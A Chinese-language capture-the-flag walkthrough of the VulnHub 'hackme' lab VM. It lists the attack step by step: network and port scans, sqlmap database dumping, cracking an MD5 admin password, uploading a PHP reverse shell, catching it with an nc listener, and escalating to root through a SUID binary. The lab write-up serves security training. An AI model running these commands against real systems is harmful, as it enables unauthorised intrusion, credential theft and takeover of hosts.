vulnhub之hackme的实践

admin 2024年9月23日12:46:51评论18 views字数 918阅读3分3秒阅读模式

本周实践的是vulnhub的hackme镜像,

有两个阻塞点,又是不抛弃不放弃的一天,

下载地址,https://download.vulnhub.com/hackme/hackme.ova,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.88.0/24,

获取到靶机地址是192.168.88.140,

vulnhub之hackme的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.140,

发现靶机开了22端口的ssh服务、80端口的http服务,

vulnhub之hackme的实践

浏览器访问http://192.168.88.140,发现需要登录,

vulnhub之hackme的实践

注册个新账户,

vulnhub之hackme的实践

用新账户登录,发现有输入接口,

vulnhub之hackme的实践

猜测有sql注入漏洞,上burpsuite,抓访问请求,并保存到req.txt,

vulnhub之hackme的实践

暴破数据库,sqlmap -r req.txt --dbs --batch,

获取到webapphacking,

vulnhub之hackme的实践

暴破数据表,sqlmap -r req.txt -D webapphacking --dump-all --batch,获取到superadmin账户和密码,密码是md5的哈希值,

vulnhub之hackme的实践

在线破解md5,获取到Uncrackable,

vulnhub之hackme的实践

用superadmin/Uncrackable登录,发现文件上传接口,

vulnhub之hackme的实践

本地准备web shell脚本,并上传,

cp /usr/share/webshells/php/php-reverse-shell.php shell.php,

不知道传哪儿去了,做一下http服务路径的暴破,

dirb http://192.168.88.140,

获取到http://192.168.88.140/uploads,

vulnhub之hackme的实践

kali攻击机上开启反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.88.140/uploads/shell.php,

获取到反弹shell,

vulnhub之hackme的实践

查找root权限程序,find / -perm -u=s -type f 2>/dev/null,

获取到/home/legacy/touchmenot,

执行获取到新的shell,id确认是root,

vulnhub之hackme的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之hackme的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月23日12:46:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之hackme的实践https://cn-sec.com/archives/3196744.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息